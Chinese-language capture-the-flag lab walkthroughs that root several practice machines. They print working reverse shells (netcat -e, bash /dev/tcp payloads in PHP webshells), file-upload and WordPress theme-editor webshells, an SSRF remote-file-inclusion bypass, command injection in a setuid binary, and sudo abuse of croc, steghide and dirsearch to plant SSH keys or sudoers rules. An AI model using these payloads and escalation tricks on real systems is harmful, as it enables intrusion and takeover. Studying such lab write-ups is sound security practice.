eviden@GameShell:/$ busybox nc 192.168.3.219 443 -e /bin/bash

再次反弹shell

/usr/bin/script -qc /bin/bash /dev/null
eviden@GameShell:/$ id
id
uid=1001(eviden) gid=1001(eviden) groups=1001(eviden)
eviden@GameShell:/$ sudo -l
sudo -l
Matching Defaults entries for eviden on GameShell:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eviden may run the following commands on GameShell:
    (ALL) NOPASSWD: /usr/local/bin/croc

croc可以去搜一下是传输⽂件的⼯具 并且可写 那就传个公钥吧，并且是sudo的权限

kali:
cat ~/.ssh/id_ed25519.pub > authorized_keys
croc --ip 192.168.3.219 send authorized_keys
croc --ip 192.168.3.74 send authorized_keys
Sending 'authorized_keys' (95 B) 
Code is: 7312-bridge-africa-brenda

On the other computer run:
(For Windows)
    croc 7312-bridge-africa-brenda
(For Linux/macOS)
    CROC_SECRET="7312-bridge-africa-brenda" croc 

Sending (->192.168.3.74:42810)
authorized_keys 100% |████████████████████| (95/95 B, 219 kB/s)

eviden@GameShell:
eviden@GameShell:/$ sudo croc --yes --out /root/.ssh
sudo croc --yes --out /root/.ssh
Enter receive code: 7312-bridge-africa-brenda
Enter receive code: 7312-bridge-africa-brenda
Receiving 'authorized_keys' (95 B) 

Receiving (<-192.168.3.219:9009)

Overwrite 'authorized_keys'? (y/N) (use --overwrite to omit) y
y
 authorized_keys 100% |████████████████████| (95/95 B, 32 kB/s)

─# ssh root@192.168.3.74 -i ~/.ssh/id_ed25519
The authenticity of host '192.168.3.74 (192.168.3.74)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:4: [hashed name]
    ~/.ssh/known_hosts:10: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.74' (ED25519) to the list of known hosts.
Linux GameShell 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@GameShell:~# id
uid=0(root) gid=0(root) groups=0(root)
root@GameShell:~# 拿下root

word

user

打开网站扫描端口，依然是80和22

然后访问80端口，扫描出来banner.php和wordpress，访问banner.php发现是一个，不给中间访问会发现卡，我当时打user是直接借用打htb的方法，在/etc/hosts里面添加

10.247.102.175  word.dsz

使用dirsearch和gobuster dir 和wpscan扫出来http://word.dsz/wordpress/wp-content/uploads

发现是一个文件目录，在里面存在pass.txt,然后使用

wpscan --url http://10.247.102.175/wordpress --enumerate u

发现存在root用户，并且在前面扫描出来他的后台

root/S9ZF6mtLdHfmr8PmCq3i(好吧，虽然我尝试直接ssh登录，一直卡那，并且还去问了努力哥🤡)

登录成功，之后借用babycms的思路，在他的主题编译器里面找php文件去反弹shell，我这里是用的patterns/banner-about-book.php 文件

之后访问http://word.dsz/wordpress/wp-content/themes/twentytwentyfive/patterns/banner-about-book.php

nc -lvvp 4444              
listening on [any] 4444 ...
connect to [10.247.102.219] from word.dsz [10.247.102.175] 39364
bash: cannot set terminal process group (474): Inappropriate ioctl for device
bash: no job control in this shell
<press/wp-content/themes/twentytwentyfive/patterns$ /usr/bin/script -qc /bin/bash /dev/null
<e/patterns$ /usr/bin/script -qc /bin/bash /dev/null
<press/wp-content/themes/twentytwentyfive/patterns$ cd /
cd /
www-data@Word:/$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
www-data@Word:/$ dpkg -V 2>/dev/null
dpkg -V 2>/dev/null
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5??????   /usr/lib/mysql/plugin/auth_pam_tool_dir/auth_pam_tool
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
??5?????? c /etc/sudoers
??5?????? c /etc/sudoers.d/README
??5?????? c /etc/inspircd/inspircd.conf
??5?????? c /etc/inspircd/inspircd.motd
??5?????? c /etc/inspircd/inspircd.rules
??5??????   /usr/bin/top
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla
??5?????? c /etc/issue
www-data@Word:/$ cat /usr/bin/top
cat /usr/bin/top
#!/bin/bash

echo 'jUOhu37yYllYiVxQNw8G'
systemctl restart ssh

反弹成功拿下user

root

在上面打出了dpkg -V 2>/dev/null命令，
www-data@Word:/$ cat /usr/bin/top
cat /usr/bin/top
#!/bin/bash

echo 'jUOhu37yYllYiVxQNw8G'
systemctl restart ssh

cat banner.php
cat b*
<?php
// 设置页面标题和字符编码
$page_title = "定制你的SSH欢迎界面";
$saved_message = "";

// 处理表单提交
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['banner_text'])) {
    $banner_text = $_POST['banner_text'];
    $file_path = '/home/ssh-banner/banner.txt';
    
    // 确保目录存在
    $dir = dirname($file_path);
    if (!is_dir($dir)) {
        mkdir($dir, 0755, true);
    }
    
    // 尝试保存文件
    if (file_put_contents($file_path, $banner_text) !== false) {
        $saved_message = "Banner Saved.  try ssh ";
    } else {
        $saved_message = "Banner Saved failed.";
    }
}

// 尝试读取现有内容
$current_content = "";
$file_path = '/home/ssh-banner/banner.txt';
if (file_exists($file_path)) {
    $current_content = htmlspecialchars(file_get_contents($file_path));
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <title><?php echo $page_title; ?></title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
            background-color: #f5f5f5;
            color: #333;
        }
        .container {
            background-color: white;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            padding: 30px;
            margin-top: 20px;
        }
        h1 {
            color: #2c3e50;
            border-bottom: 2px solid #3498db;
            padding-bottom: 10px;
        }
        .form-group {
            margin-bottom: 20px;
        }
        label {
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
        }
        textarea {
            width: 100%;
            height: 200px;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-family: monospace;
            resize: vertical;
        }
        .btn {
            background-color: #3498db;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
        }
        .btn:hover {
            background-color: #2980b9;
        }
        .message {
            padding: 10px;
            margin: 15px 0;
            border-radius: 4px;
            text-align: center;
        }
        .success {
            background-color: #d4edda;
            color: #155724;
            border: 1px solid #c3e6cb;
        }
        .error {
            background-color: #f8d7da;
            color: #721c24;
            border: 1px solid #f5c6cb;
        }
        .preview {
            background-color: #2c3e50;
            color: #ecf0f1;
            border-radius: 4px;
            padding: 15px;
            margin-top: 20px;
            font-family: monospace;
            white-space: pre-wrap;
        }
        .preview-title {
            font-weight: bold;
            margin-bottom: 10px;
            color: #3498db;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1><?php echo $page_title; ?></h1>
        
        <?php if (!empty($saved_message)): ?>
            <div class="message <?php echo strpos($saved_message, '错误') !== false ? 'error' : 'success'; ?>">
                <?php echo $saved_message; ?>
            </div>
        <?php endif; ?>
        
        <form method="POST" action="">
            <div class="form-group">
                <label for="banner_text">SSH欢迎信息内容：</label>
                <textarea id="banner_text" name="banner_text" placeholder="在此输入SSH登录时显示的欢迎信息..."><?php echo $current_content; ?></textarea>
            </div>
            
            <button type="submit" class="btn">保存Banner</button>
        </form>
        
        <?php if (!empty($current_content)): ?>
        <div class="preview">
            <div class="preview-title">预览效果：</div>
            <?php echo nl2br($current_content); ?>
        </div>
        <?php endif; ?>
    </div>
</body>
</html>

直接去问ai:

这是一个SSH 欢迎信息定制页面，核心功能是将用户输入的内容写入 /home/ssh-banner/banner.txt 文件 —— 这个场景下藏着一个关键提权突破口：利用 SSH Banner 文件的加载机制，让靶机自动执行我们植入的命令，最终获取高权限用户（甚至 root）的 shell。

并且通过上面的jUOhu37yYllYiVxQNw8G 直接ssh登录ssh-banner发现登录成功

ssh-banner@Word:~$ ls -al
total 28
drwxr-xr-x 2 ssh-banner ssh-banner 4096 Nov 15 03:51 .
drwxr-xr-x 3 root       root       4096 Nov 14 21:59 ..
-rwxrwxrwx 1 root       root         47 Nov 29 08:46 banner.txt
lrwxrwxrwx 1 root       root          9 Nov 15 03:51 .bash_history -> /dev/null                                                                           
-rw-r--r-- 1 ssh-banner ssh-banner  220 Nov 14 21:59 .bash_logout
-rw-r--r-- 1 ssh-banner ssh-banner 3526 Nov 14 21:59 .bashrc
-rw-r--r-- 1 ssh-banner ssh-banner  807 Nov 14 21:59 .profile
-rw-r--r-- 1 root       root         44 Nov 14 22:10 user.txt
ssh-banner@Word:~$ ln -sf /root/root.txt banner.txt//

让 banner.txt 成为 /root/root.txt 的 “快捷方式”

直接去ssh连接

ssh-banner@Word:~$ ssh ssh-banner@10.247.102.175
The authenticity of host '10.247.102.175 (10.247.102.175)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.247.102.175' (ECDSA) to the list of known hosts.
flag{root-a46ec67a0f2e7c387926ac5d783ea4b8}
ssh-banner@10.247.102.175's password: 
Connection closed by 10.247.102.175 port 22
拿下root.txt

open

user

打看网站，同样的，和上面一样加入

10.247.102.236 open.dsz  更加稳定一些

然后发现是一个可以进行ssrf的地方，不过必须是http://open的前缀，这里借用hyh大神的讲解

https://username:password@subdomain.example.com:8080/path/to/resource.html?
key1=value1&key2=value2#section2
分解：
协议（scheme）：https
用户名：username
密码：password
主机（域名/IP）：subdomain.example.com
端口：8080
路径：/path/to/resource.html
查询参数（query string）：?key1=value1&key2=value2
片段标识符（fragment）：#section2
那么可以联想到，将open作为用户名，然后IP可以自己控制从而绕过。这里使用的是远程文件包含

直接远程文件包含，在kali里面写入shell.php

里面是<?php system("/bin/bash -c 'bash -i >& /dev/tcp/10.247.102.219/2332 0>&1'")?>

┌──(root㉿kali2025)-[/home/wea5e1]
└─# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.247.102.236 - - [01/Dec/2025 19:07:58] "GET /shell.php HTTP/1.1" 200 -

root

└─# nc -lvvp 2332
listening on [any] 2332 ...
connect to [10.247.102.219] from open.dsz [10.247.102.236] 57214
bash: cannot set terminal process group (418): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Open:/var/www/open.dsz$ ls
/usr/bin/script -qc /bin/bash /dev/null //使shell更加稳定

www-data@Open:/home/miao$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/echo

这里看到一个echo

/opt/echo "1"   
/opt/echo "1"
执行命令: echo '[用户输入]: 1'
[用户输入]: 1
www-data@Open:/home/miao$ /opt/echo "1'"
/opt/echo "1'"
执行命令: echo '[用户输入]: 1''
sh: 1: Syntax error: Unterminated quoted string
www-data@Open:/home/miao$ /opt/echo "1';id"
/opt/echo "1';id"
执行命令: echo '[用户输入]: 1';id'
sh: 1: Syntax error: Unterminated quoted string
www-data@Open:/home/miao$ /opt/echo "123';id'"
/opt/echo "123';id'"
执行命令: echo '[用户输入]: 123';id''
[用户输入]: 123
uid=1000(miao) gid=1000(miao) groups=1000(miao),33(www-data) 发现可以使用'绕过去执行命令

mao

user

信息搜集一下

nmap -sV -T4 10.247.102.83
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-08 22:54 CST
Nmap scan report for 10.247.102.83
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))

dir一下
[22:56:24] 302 -    0B  - /dashboard.php  ->  index.php                     
[22:56:27] 200 -   66B  - /home.php                                         
[22:56:29] 302 -    0B  - /logout.php  ->  index.php
[22:56:35] 200 -  198B  - /settings.php                                     
[22:56:36] 200 -  323B  - /stats.php                                        

去看看80端口，发现是一个登录页面，发现使用admin是密码错误，那就去爆破

admin/pinkgir1

登录进去随便点点看看
http://10.247.102.83/dashboard.php?page=home.php
？？？
文件包含

http://10.247.102.83/dashboard.php?page=/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin lingmj:x:1000:1000:,,,:/home/lingmj:/bin/bash oneoneone:x:1001:1001:,,,:/home/oneoneone:/bin/bash todd:x:1002:1002:,,,:/home/todd:/bin/bash 

于是就得三个用户lingmj 1001 todd

通过爆破获得lingmj的密码为babyface

ssh lingmj@10.247.102.83

lingmj@Mao:~$ 

root

lingmj@Mao:/$ sudo -l
Matching Defaults entries for lingmj on Mao:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User lingmj may run the following commands on Mao:
    (ALL) NOPASSWD: /usr/bin/steghide
lingmj@Mao:/$ 

之前学过misc的都知道这个是隐写工具，可以去文件合在一起 这里参考q群wp一共有5个方法

1

直接包含root.txt

首先使用py打开端口去远程文件包含，然后上传一个图片

kali本地

python3 -m http.server 8000                        
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.247.102.83 - - [08/Dec/2025 23:18:37] "GET /A033.jpg HTTP/1.1" 200 -
----------------------------------------

shell

lingmj@Mao:/$ cd /tmp
lingmj@Mao:/tmp$ busybox wget http://10.247.102.219:8000/A033.jpg
Connecting to 10.247.102.219:8000 (10.247.102.219:8000)
A033.jpg             100% |*****************************| 1604k  0:00:00 ETA
lingmj@Mao:/tmp$ 

lingmj@Mao:/tmp$ sudo /usr/bin/steghide embed -ef /root/root.txt -cf ./1.jpg
Enter passphrase: 
Re-Enter passphrase: 
embedding "/root/root.txt" in "./1.jpg"... done
lingmj@Mao:/tmp$ /usr/bin/steghide extract -sf ./1.jpg
Enter passphrase: 
wrote extracted data to "root.txt".
lingmj@Mao:/tmp$ ls
1.jpg
A033.jpg
root.txt
systemd-private-72a297aad5464f55b8ddd654e80c77f5-apache2.service-YKV5Xf
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-logind.service-6NtfCg
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-timesyncd.service-e9oD1f
lingmj@Mao:/tmp$ cat root.txt
flag{root-5ad6f10629504ec51038b8c14a1fb9c6}
lingmj@Mao:/tmp$ 
拿下root

2

为lingmj赋予无密码执行完整sudo的权限(这个方案是老大提供的)

创建一个恶意的sudoers文件，这个内容是赋予lingmj无密码执行所有sudo命令的权限

echo 'lingmj ALL=(ALL:ALL) NOPASSWD:ALL' > a

通过隐写，放到/etc/sudoers.d特权目录下

lingmj@Mao:/tmp$ echo 'lingmj ALL=(ALL:ALL) NOPASSWD:ALL' > a
lingmj@Mao:/tmp$ ls
1.jpg
a
A033.jpg
root.txt
systemd-private-72a297aad5464f55b8ddd654e80c77f5-apache2.service-YKV5Xf
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-logind.service-6NtfCg
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-timesyncd.service-e9oD1f
lingmj@Mao:/tmp$ steghide embed -cf 1.jpg -ef a
Enter passphrase: 
Re-Enter passphrase: 
embedding "a" in "1.jpg"... done
lingmj@Mao:/tmp$ cd /etc/sudoers.d
lingmj@Mao:/etc/sudoers.d$ /etc/sudoers.d$ ls -al
-bash: /etc/sudoers.d$: No such file or directory
lingmj@Mao:/etc/sudoers.d$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Apr  4  2025 .
drwxr-xr-x 82 root root 4096 Dec  8 09:52 ..
-r--r-----  1 root root  958 Jan 14  2023 README
lingmj@Mao:/etc/sudoers.d$ sudo steghide extract -sf /tmp/1.jpg
Enter passphrase: 
wrote extracted data to "a".
lingmj@Mao:/etc/sudoers.d$ ls -al
total 16
drwxr-xr-x  2 root root 4096 Dec  8 10:36 .
drwxr-xr-x 82 root root 4096 Dec  8 09:52 ..
-rw-r--r--  1 root root   34 Dec  8 10:36 a
-r--r-----  1 root root  958 Jan 14  2023 README
lingmj@Mao:/etc/sudoers.d$ cat a
lingmj ALL=(ALL:ALL) NOPASSWD:ALL
lingmj@Mao:/etc/sudoers.d$ sudo -l
Matching Defaults entries for lingmj on Mao:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User lingmj may run the following commands on Mao:
    (ALL) NOPASSWD: /usr/bin/steghide
    (ALL : ALL) NOPASSWD: ALL
lingmj@Mao:/etc/sudoers.d$ id
uid=1000(lingmj) gid=1000(lingmj) groups=1000(lingmj)
lingmj@Mao:/etc/sudoers.d$ sudo -i
root@Mao:~# id
uid=0(root) gid=0(root) groups=0(root)

1. lingmj@Mao:~$ steghide embed -cf 1.jpg -ef a使用 steghide 工具将文件a（待隐藏的文件）嵌入到载体图片1.jpg中，执行隐写操作。
2. Enter passphrase:提示输入密码（用于加密隐藏的文件a，后续提取时需输入相同密码）。
3. Re-Enter passphrase:再次输入密码确认（确保两次输入一致）。
4. embedding "a" in "1.jpg"... done操作完成提示：文件a已成功嵌入到1.jpg中。
5. lingmj@Mao:~$ cd /etc/sudoers.d切换到/etc/sudoers.d目录（该目录用于存放 sudo 权限配置文件，只有 root 用户有写入权限）。
6. lingmj@Mao:/etc/sudoers.d$ ls -al列出当前目录下的所有文件（包括隐藏文件）及详细权限信息，此时目录中只有README文件。
7. lingmj@Mao:/etc/sudoers.d$ sudo steghide extract -sf ~/1.jpg使用 root 权限（sudo）从~/1.jpg（之前嵌入了文件a的图片）中提取隐藏的文件，-sf指定载体文件路径。
8. Enter passphrase:提示输入嵌入时设置的密码（用于解密并提取文件a）。
9. wrote extracted data to "a".提取完成提示：隐藏的文件a已成功提取到当前目录（/etc/sudoers.d）。
10. lingmj@Mao:/etc/sudoers.d$ ls -al再次查看目录文件，此时新增了提取出的a文件（权限为-rw-r--r--，由 root 创建）。
11. lingmj@Mao:/etc/sudoers.d$ cat a查看文件a的内容，显示为sudo权限配置规则：允许用户lingmj无需密码执行所有命令。
12. lingmj@Mao:/etc/sudoers.d$ sudo -l验证当前用户lingmj的sudo权限，输出显示其被允许无需密码使用/usr/bin/steghide命令（符合文件a中的配置）。

整个流程的核心是：通过隐写术将sudo权限配置文件a隐藏在图片中，再提取到/etc/sudoers.d目录，实现对用户权限的配置。

3

111大佬的

之后再补吧，唉

靶机复现-Search

user

打开靶机 三件套 nmap,dirsearch gobuster dir

nmap出来22和80端口

gobuster dir -u http://10.247.102.224 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.247.102.224
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/admin                (Status: 301) [Size: 316] [--> http://10.247.102.224/admin/]                                                                        
/api                  (Status: 301) [Size: 314] [--> http://10.247.102.224/api/]                                                                          
/assets               (Status: 301) [Size: 317] [--> http://10.247.102.224/assets/]                                                                       
/favicon.ico          (Status: 200) [Size: 4286]
/index                (Status: 200) [Size: 80683]
/index.php            (Status: 200) [Size: 80676]
/Java                 (Status: 200) [Size: 64546]
/javascript           (Status: 200) [Size: 62969]
/java                 (Status: 200) [Size: 64546]
/php                  (Status: 200) [Size: 58255]
/PHP                  (Status: 200) [Size: 58255]
/robots.txt           (Status: 200) [Size: 25]
/server-status        (Status: 403) [Size: 279]
/static               (Status: 301) [Size: 317] [--> http://10.247.102.224/static/]                                                                       
/uploads              (Status: 301) [Size: 318] [--> http://10.247.102.224/uploads/]                                                                      
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished

dirsearch就不展示了

发现setup.txt里面存在账号和密码，登录之后是feehi cms，信息搜集一下发现可能存在的漏洞

发现在广告管理里面存在文件上传漏洞，直接插入webshell通过反弹shell进入内网

------WebKitFormBoundaryAqHilH6RnHBZLCys

Content-Disposition: form-data; name="AdForm[ad]"; filename="A033.php"

Content-Type: image/jpeg
<?php
exec("/bin/bash -c'bash -i >& /dev/tcp/kali/7777 0>&1'");?>

www-data@Search:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on Search:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Search:
    (7r1umphk) NOPASSWD: /usr/local/bin/dirsearch
www-data@Search:/home$ 

反弹成功

然后sudo -l 看一下怎么去提权，发现是dirsearch这个扫描工具

ww-data@Search:/tmp$ sudo -u 7r1umphk dirsearch -u http://127.0.0.1
sudo -u 7r1umphk dirsearch -u http://127.0.0.1

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /tmp/reports/http_127.0.0.1/_25-12-09_08-44-56.txt

Target: http://127.0.0.1/

[08:44:56] Starting: 
[                    ]  0%
没啥特别的

/usr/local/bin/dirsearch -h
Usage: dirsearch [-u|--url] target [-e|--extensions] extensions [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Mandatory:
    -u URL, --url=URL   Target URL(s), can use multiple flags
    -l PATH, --url-file=PATH
                        URL list file
    --stdin             Read URL(s) from STDIN
    --cidr=CIDR         Target CIDR
    --raw=PATH          Load raw HTTP request from file (use `--scheme` flag
                        to set the scheme)
    -s SESSION_FILE, --session=SESSION_FILE
                        Session file
    --config=PATH       Full path to config file, see 'config.ini' for example
                        (Default: config.ini)

  Dictionary Settings:
    -w WORDLISTS, --wordlists=WORDLISTS
                        Customize wordlists (separated by commas)
    -e EXTENSIONS, --extensions=EXTENSIONS
                        Extension list separated by commas (e.g. php,asp)
    -f, --force-extensions
                        Add extensions to the end of every wordlist entry. By
                        default dirsearch only replaces the %EXT% keyword with
                        extensions
    -O, --overwrite-extensions
                        Overwrite other extensions in the wordlist with your
                        extensions (selected via `-e`)
    --exclude-extensions=EXTENSIONS
                        Exclude extension list separated by commas (e.g.
                        asp,jsp)
    --remove-extensions
                        Remove extensions in all paths (e.g. admin.php ->
                        admin)
    --prefixes=PREFIXES
                        Add custom prefixes to all wordlist entries (separated
                        by commas)
    --suffixes=SUFFIXES
                        Add custom suffixes to all wordlist entries, ignore
                        directories (separated by commas)
    -U, --uppercase     Uppercase wordlist
    -L, --lowercase     Lowercase wordlist
    -C, --capital       Capital wordlist

  General Settings:
    -t THREADS, --threads=THREADS
                        Number of threads
    -r, --recursive     Brute-force recursively
    --deep-recursive    Perform recursive scan on every directory depth (e.g.
                        api/users -> api/)
    --force-recursive   Do recursive brute-force for every found path, not
                        only directories
    -R DEPTH, --max-recursion-depth=DEPTH
                        Maximum recursion depth
    --recursion-status=CODES
                        Valid status codes to perform recursive scan, support
                        ranges (separated by commas)
    --subdirs=SUBDIRS   Scan sub-directories of the given URL[s] (separated by
                        commas)
    --exclude-subdirs=SUBDIRS
                        Exclude the following subdirectories during recursive
                        scan (separated by commas)
    -i CODES, --include-status=CODES
                        Include status codes, separated by commas, support
                        ranges (e.g. 200,300-399)
    -x CODES, --exclude-status=CODES
                        Exclude status codes, separated by commas, support
                        ranges (e.g. 301,500-599)
    --exclude-sizes=SIZES
                        Exclude responses by sizes, separated by commas (e.g.
                        0B,4KB)
    --exclude-text=TEXTS
                        Exclude responses by text, can use multiple flags
    --exclude-regex=REGEX
                        Exclude responses by regular expression
    --exclude-redirect=STRING
                        Exclude responses if this regex (or text) matches
                        redirect URL (e.g. '/index.html')
    --exclude-response=PATH
                        Exclude responses similar to response of this page,
                        path as input (e.g. 404.html)
    --skip-on-status=CODES
                        Skip target whenever hit one of these status codes,
                        separated by commas, support ranges
    --min-response-size=LENGTH
                        Minimum response length
    --max-response-size=LENGTH
                        Maximum response length
    --max-time=SECONDS  Maximum runtime for the scan
    --exit-on-error     Exit whenever an error occurs

  Request Settings:
    -m METHOD, --http-method=METHOD
                        HTTP method (default: GET)
    -d DATA, --data=DATA
                        HTTP request data
    --data-file=PATH    File contains HTTP request data
    -H HEADERS, --header=HEADERS
                        HTTP request header, can use multiple flags
    --header-file=PATH  File contains HTTP request headers
    -F, --follow-redirects
                        Follow HTTP redirects
    --random-agent      Choose a random User-Agent for each request
    --auth=CREDENTIAL   Authentication credential (e.g. user:password or
                        bearer token)
    --auth-type=TYPE    Authentication type (basic, digest, bearer, ntlm, jwt,
                        oauth2)
    --cert-file=PATH    File contains client-side certificate
    --key-file=PATH     File contains client-side certificate private key
                        (unencrypted)
    --user-agent=USER_AGENT
    --cookie=COOKIE     

  Connection Settings:
    --timeout=TIMEOUT   Connection timeout
    --delay=DELAY       Delay between requests
    --proxy=PROXY       Proxy URL (HTTP/SOCKS), can use multiple flags
    --proxy-file=PATH   File contains proxy servers
    --proxy-auth=CREDENTIAL
                        Proxy authentication credential
    --replay-proxy=PROXY
                        Proxy to replay with found paths
    --tor               Use Tor network as proxy
    --scheme=SCHEME     Scheme for raw request or if there is no scheme in the
                        URL (Default: auto-detect)
    --max-rate=RATE     Max requests per second
    --retries=RETRIES   Number of retries for failed requests
    --ip=IP             Server IP address

  Advanced Settings:
    --crawl             Crawl for new paths in responses

  View Settings:
    --full-url          Full URLs in the output (enabled automatically in
                        quiet mode)
    --redirects-history
                        Show redirects history
    --no-color          No colored output
    -q, --quiet-mode    Quiet mode

  Output Settings:
    -o PATH, --output=PATH
                        Output file
    --format=FORMAT     Report format (Available: simple, plain, json, xml,
                        md, csv, html, sqlite)
    --log=PATH          Log file
www-data@Search:/tmp$ 

查看帮助

--log=PATH 是命令行工具中常见的参数，作用是将工具运行过程中的日志信息（操作记录、状态、错误等）保存到指定路径（PATH）的文件中

sudo -u 7r1umphk dirsearch -u http://127.0.0.1 -w /home/7r1umphk/user.txt --log=/tmp/1.txt

先利用其高权限短暂的切换用户，然后利用 wordlist 参数传入文件路径，触发报错泄露文件内容，通过报错获得user.txt里面的内容

2025-12-09 08:55:13,129 [INFO] "GET http://127.0.0.1/flag{user-681db772f6844d4c84da083c3d280954}" 404 - 33003B
www-data@Search:/tmp$ 拿下user

可以去拿user.txt，看看能不能去拿下密钥，应该是可以的

sudo -u 7r1umphk /usr/local/bin/dirsearch -l /home/7r1umphk/.ssh/id_ed25519

root

靶机复现-lzh

user

打开靶机namp扫描，然后dir或者gobuster dir去扫描

端口是22和80
后台出来是backup.zip

发现出来一个是关于这个的mozilo框架

然后就搜一下他的版本号以及看看有没有历史漏洞，发现MoziloCMS 3.0 – Remote Code Execution (RCE) – PHP webapps Exploit

简单来说就是通过进入内部去文件上传，去执行php代码

通过去爆破用户user和密码

admin/Admin123

然后在文件管理里面去文件上传，不过他刚开始是不会解析php文件，需要先去传txt文件，然后去重命名就可以了

<?php
exec("busybox nc 10.247.102.219 4444 -e bash")?>

成功反弹shell成功，然后去home下面发现welcome用户

在努力哥wp中提到账号密码通常可能存在于配置文件里面，或者直接敲命令查找关于用户的内容

